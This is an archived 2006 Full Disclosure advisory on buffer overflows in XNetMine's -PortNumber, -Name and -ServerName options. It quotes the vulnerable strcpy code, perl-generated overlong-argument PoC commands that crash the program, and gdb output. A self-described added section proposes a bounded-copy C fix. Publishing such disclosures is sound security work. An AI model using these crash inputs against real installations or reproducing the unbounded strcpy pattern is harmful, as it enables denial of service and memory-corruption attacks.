Full Disclosure mailing list archives
XNetMine (no version) multiple buffer overflow.
From: Federico Fazzi <federico () autistici org>
Date: Wed, 18 Oct 2006 13:18:51 +0200
//
Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz

*Vulnerable code:*
--
line: 672/676

    if (strncmp("-PortNumber",argv[t+1],11)==0) {
        char text[500];
        strcpy(text,argv[t+1]);
        strcpy(Port,&text[11]);
    }

--
line: 677/682

    if (strncmp("-Name",argv[t+1],5)==0) {
        char text[500];
        strcpy(text,argv[t+1]);
        strcpy(User,&text[5]);
    }

--
line: 683/688

    if (strncmp("-ServerName",argv[t+1],11)==0) {
        char text[500];
        strcpy(text,argv[t+1]);
        strcpy(ServerName,&text[11]);
    }

--

*Proof of concept:*
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...) ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337 Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--

*Debug information:*
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862
(gdb) stepi

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()
--

federico
federico () plugs it / http://defsol.plugs.it/
//
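The three faulty blocks above share one pattern: a fixed 500-byte stack buffer filled by `strcpy` from an attacker-controlled `argv` entry, then a second unbounded `strcpy` into a global. The following is an added example of how the same option parsing can be written with bounded copies; it is not XNetMine's code and not part of the advisory. The `struct options`, the buffer sizes `PORT_LEN` and `NAME_LEN`, and the choice to reject (rather than truncate) an overlong value are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed buffer sizes for this example; XNetMine's own globals
 * (Port, User, ServerName) are not shown in the advisory. */
#define PORT_LEN 16
#define NAME_LEN 64

struct options {
    int  server;                  /* set by the bare -Server flag */
    char port[PORT_LEN];
    char user[NAME_LEN];
    char server_name[NAME_LEN];
};

/* If `arg` starts with `prefix`, copy the remainder into dst (dst_size bytes).
 * Returns 1 if copied, 0 if the option does not match, -1 if the value would
 * not fit. Refusing instead of truncating keeps a bad argument from turning
 * into a silently different port or name. */
static int copy_option_value(const char *arg, const char *prefix,
                             char *dst, size_t dst_size)
{
    size_t plen = strlen(prefix);
    if (strncmp(arg, prefix, plen) != 0)
        return 0;
    const char *value = arg + plen;
    size_t vlen = strlen(value);
    if (vlen >= dst_size)          /* must leave room for the terminating NUL */
        return -1;
    memcpy(dst, value, vlen + 1);  /* copies the NUL too */
    return 1;
}

/* Walk argv the way the XNetMine loop does (value glued to the option name),
 * but with every copy bounded. Returns 0 on success, or the index of the
 * argument that was rejected. Unknown arguments are ignored. */
static int parse_options(int argc, char **argv, struct options *opt)
{
    memset(opt, 0, sizeof *opt);
    for (int i = 1; i < argc; i++) {
        const char *a = argv[i];
        int r;
        if (strcmp(a, "-Server") == 0) { opt->server = 1; continue; }
        if ((r = copy_option_value(a, "-PortNumber", opt->port, sizeof opt->port)) != 0 ||
            (r = copy_option_value(a, "-ServerName", opt->server_name, sizeof opt->server_name)) != 0 ||
            (r = copy_option_value(a, "-Name", opt->user, sizeof opt->user)) != 0) {
            if (r < 0)
                return i;
        }
    }
    return 0;
}

/* Constructed command line matching the advisory's third PoC prefix.
 * Returns 1 when parsing succeeds and every field holds what was passed. */
static int demo_normal(void)
{
    char *argv[] = { "XNetMine", "-Server", "-PortNumber31337", "-Name31337", NULL };
    struct options opt;
    if (parse_options(4, argv, &opt) != 0) return 0;
    return opt.server == 1 && strcmp(opt.port, "31337") == 0 &&
           strcmp(opt.user, "31337") == 0 && opt.server_name[0] == '\0';
}

/* Constructed 504-byte -Name value, the length used in the advisory's PoC.
 * Returns the index of the rejected argument (3) instead of overflowing. */
static int demo_overlong(void)
{
    static char name[5 + 504 + 1];
    memcpy(name, "-Name", 5);
    memset(name + 5, 'A', 504);
    name[sizeof name - 1] = '\0';
    char *argv[] = { "XNetMine", "-Server", "-PortNumber31337", name, NULL };
    struct options opt;
    return parse_options(4, argv, &opt);
}

/* Boundary check: PORT_LEN-1 characters fit, PORT_LEN characters do not. */
static int demo_boundary(void)
{
    char fits[PORT_LEN], too_long[PORT_LEN + 1];
    memset(fits, '7', PORT_LEN - 1);     fits[PORT_LEN - 1] = '\0';
    memset(too_long, '7', PORT_LEN);     too_long[PORT_LEN] = '\0';
    char *argv_ok[]  = { "XNetMine", "-PortNumber" };
    char *argv_bad[] = { "XNetMine", "-PortNumber" };
    char buf_ok[sizeof "-PortNumber" + PORT_LEN], buf_bad[sizeof "-PortNumber" + PORT_LEN];
    snprintf(buf_ok,  sizeof buf_ok,  "-PortNumber%s", fits);
    snprintf(buf_bad, sizeof buf_bad, "-PortNumber%s", too_long);
    argv_ok[1] = buf_ok;
    argv_bad[1] = buf_bad;
    struct options opt;
    return parse_options(2, argv_ok, &opt) == 0 && parse_options(2, argv_bad, &opt) == 1;
}

int main(void)
{
    printf("normal parse: %s\n", demo_normal() ? "ok" : "FAILED");
    printf("504-byte -Name: rejected argument %d\n", demo_overlong());
    printf("boundary behaviour: %s\n", demo_boundary() ? "ok" : "FAILED");
    return 0;
}
```

The point of returning an error instead of truncating is that an overlong `-PortNumber` value cannot become a different, shorter port number; the caller can print usage and exit. The same bounded helper replaces all three `strcpy` pairs, so there is one place to audit rather than three copies of the pattern.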
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/